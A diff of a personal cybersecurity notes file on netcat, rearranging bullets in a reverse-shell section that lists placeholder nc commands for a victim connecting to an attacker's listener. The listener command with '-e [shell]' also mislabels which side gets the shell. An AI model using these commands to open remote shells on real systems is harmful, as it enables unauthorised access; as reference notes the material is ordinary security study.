Thanatisia/SharedSpace/Docs/CyberSecurity/Tools/netcat.md

 		```

 - Connect from a remote target/victim system (Reverse Shell)
+	- Connect to Listener (Attacker) system
-	- On the target/victim system
+		+ On the target/victim system
 		```console
 		nc [target-ip-address] [port-number-to-connect]
 		```
+	- Start Listening Mode
-	- On the attacker system
+		+ On the attacker system
+		+ To wait for the victim/target to activate a payload that will connect to this listener
 		```console
 		nc -l -v -p [port-number-to-listen] -e [shell]
 		```